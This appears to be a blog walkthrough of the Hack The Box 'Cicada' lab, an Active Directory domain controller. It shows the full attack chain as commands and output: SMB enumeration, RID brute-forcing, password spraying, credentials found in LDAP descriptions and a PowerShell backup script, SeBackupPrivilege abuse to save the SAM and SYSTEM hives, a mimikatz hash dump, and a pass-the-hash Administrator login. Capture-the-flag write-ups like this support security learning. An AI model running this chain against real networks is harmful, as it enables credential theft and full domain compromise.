A day as an active directory script kiddie - Hackthebox Cicada Walkthrough
My first hack the box writeup!
Cicada is definitely an awesome box for active directory beginners like me. XD
Target IP: 10.10.11.35
Reconnaissance
Of course the first step is nmap enumeration: nmap -p- --min-rate=10000 -Pn 10.10.11.35 to scan all ports and nmap -sC -sV for open ports to get service information.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-01 21:58:05Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
61853/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-10-01T21:58:57
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h48m48s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.75 secondsLooks like a Domain Controller. We can see that the domain is cicada.htb.
Got password, but what about username?
Viewing smb we get our first password Cicada****!8 in Notice from HR.txt.
$ smbclient //10.10.11.35/HR -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Mar 14 08:29:09 2024
.. D 0 Thu Mar 14 08:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 13:31:48 2024-N means no password.
I think the hardest part of this box is get the first username. After viewing some hints from the discussion forum, we need to brute forcing RID
$ nxc smb 10.10.11.35 -u 'guest' -p '' --rid-brute
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\guest:
SMB 10.10.11.35 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 512: CICADA\Domain Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 513: CICADA\Domain Users (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 514: CICADA\Domain Guests (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 515: CICADA\Domain Computers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 516: CICADA\Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 517: CICADA\Cert Publishers (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 518: CICADA\Schema Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 519: CICADA\Enterprise Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 525: CICADA\Protected Users (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 526: CICADA\Key Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1101: CICADA\DnsAdmins (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)And there we go, we got our potential usernames:
emily.oscars
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
Now it’s time for password spraying.
$ nxc smb 10.10.11.35 -u users.txt -p 'Cicada****!8' --continue-on-success
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\emily.oscars:Cicada****!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\john.smoulder:Cicada****!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\sarah.dantelia:Cicada****!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada****!8
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\david.orelious:Cicada****!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\Administrator:Cicada****!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\Guest:Cicada****!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\krbtgt:Cicada****!8 STATUS_LOGON_FAILURE We get our first valid credential michael.wrightson:Cicada****!8.
Lessons learned: try all the modules of netexec, maybe you’ll get a hit someday.(?)
More credential
Also I tried smb, wmi and ldap in netexec to see if we can execute command with michael.wrightson. But no luck.
I also tried rpcclient for more user enumeration. (maybe?)
$ rpcclient -U 'michael.wrightson%Cicada****!8' 10.10.11.35
michael.wrightson
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[john.smoulder] rid:[0x450]
user:[sarah.dantelia] rid:[0x451]
user:[michael.wrightson] rid:[0x452]
user:[david.orelious] rid:[0x454]
user:[emily.oscars] rid:[0x641]Nothing interesting here.
Remember that we can try to use all modules in netexec to see if we can get anything interesting?
Yes! We got something interesting in LDAP Description
$ nxc ldap 10.10.11.35 -u "michael.wrightson" -p 'Cicada****!8' -M get-desc-users
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.35 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada****!8
GET-DESC... 10.10.11.35 389 CICADA-DC [+] Found following users:
GET-DESC... 10.10.11.35 389 CICADA-DC User: Administrator description: Built-in account for administering the computer/domain
GET-DESC... 10.10.11.35 389 CICADA-DC User: Guest description: Built-in account for guest access to the computer/domain
GET-DESC... 10.10.11.35 389 CICADA-DC User: krbtgt description: Key Distribution Center Service Account
GET-DESC... 10.10.11.35 389 CICADA-DC User: david.orelious description: Just in case I forget my password is aRt****!3Again, password spraying gives us another credential david.orelious:aRt****!3. (Of course it’s his password XD)
However we still cannot get a shell of david.orelious.
More, more credential
Now back to smb, we now can view a new file in SMB using david.orelious: DEV\Backup_script.ps1.
$ nxc smb 10.10.11.35 -u "david.orelious" -p 'aRt****!3' --get-file 'Backup_script.ps1' Backup_script.ps1 --share 'DEV'
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt****!3
SMB 10.10.11.35 445 CICADA-DC [*] Copying "Backup_script.ps1" to "Backup_script.ps1"
SMB 10.10.11.35 445 CICADA-DC [+] File "Backup_script.ps1" was downloaded to "Backup_script.ps1"In Backup_script.ps1:
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!****Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"We got our third credential emily.oscars:Q!****Vt.
Finally…
$ nxc winrm 10.10.11.35 -u 'emily.oscars' -p 'Q!****Vt' -X 'whoami'
WINRM 10.10.11.35 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM 10.10.11.35 5985 CICADA-DC [+] cicada.htb\emily.oscars:Q!****Vt (Pwn3d!)
WINRM 10.10.11.35 5985 CICADA-DC [+] Executed command (shell type: powershell)
WINRM 10.10.11.35 5985 CICADA-DC cicada\emily.oscarsWe got a shell!
Note: We use -X here to execute powershell command since -x is not working.
Update: Actually evil-winrm is working, but at the time I was doing this box it just didn’t work…
Privilege Escalation
evil-winrm has some problem loading the shell(not sure why), so I just dropped a meterpreter shell and got a callback.
Update: Actually evil-winrm is working, but at the time I was doing this box it just didn’t work…
Now how can we escalate our privilege?
Since this is an easy box we don’t need to think too much
$ nxc winrm 10.10.11.35 -u 'emily.oscars' -p 'Q!****Vt' -X 'whoami /priv'
WINRM 10.10.11.35 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM 10.10.11.35 5985 CICADA-DC [+] cicada.htb\emily.oscars:Q!****Vt (Pwn3d!)
WINRM 10.10.11.35 5985 CICADA-DC [+] Executed command (shell type: powershell)
WINRM 10.10.11.35 5985 CICADA-DC
WINRM 10.10.11.35 5985 CICADA-DC PRIVILEGES INFORMATION
WINRM 10.10.11.35 5985 CICADA-DC ----------------------
WINRM 10.10.11.35 5985 CICADA-DC
WINRM 10.10.11.35 5985 CICADA-DC Privilege Name Description State
WINRM 10.10.11.35 5985 CICADA-DC ============================= ============================== =======
WINRM 10.10.11.35 5985 CICADA-DC SeBackupPrivilege Back up files and directories Enabled
WINRM 10.10.11.35 5985 CICADA-DC SeRestorePrivilege Restore files and directories Enabled
WINRM 10.10.11.35 5985 CICADA-DC SeShutdownPrivilege Shut down the system Enabled
WINRM 10.10.11.35 5985 CICADA-DC SeChangeNotifyPrivilege Bypass traverse checking Enabled
WINRM 10.10.11.35 5985 CICADA-DC SeIncreaseWorkingSetPrivilege Increase a process working set EnabledSeBackupPrivilege and SeRestorePrivilege are enabled, which is a well-known privilege escalation technique.
The rest is just steal sam and system file and dump the hash.
c:\>mkdir aaa
c:\>cd aaa
c:\aaa>reg save hklm\sam c:\aaa\sam
The operation completed successfully.
c:\aaa>reg save hklm\system c:\aaa\system
The operation completed successfully.Of course it’s kiwi time.
No antivirus so I just dropped a mimikatz on the box. For OPSEC you can download them and dump hash locally using pypykatz
mimikatz # lsadump::sam /system:C:\aaa\system /sam:C:\aaa\sam
Domain : CICADA-DC
SysKey : 3c2b033757a49110a9ee680b46e8d620
Local SID : S-1-5-21-47050115-2771739599-2321771406
SAMKey : a1c299e572ff8c643a857d3fdb3e5c7c
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 2b...41
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
Finally, we can use evil-winrm to login as Administrator.
$ evil-winrm -i 10.10.11.35 -u "Administrator" -H 2b...41
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administratorSuccessfully pwn3d the box!
Takeaways
-
Try all the modules in netexec, maybe you’ll get a surprise. https://www.netexec.wiki/ is really helpful.
I’m just an Active Directory Script Kiddie -
Enumerate more once you get a vaild credential, maybe you’ll find some more interesting credential.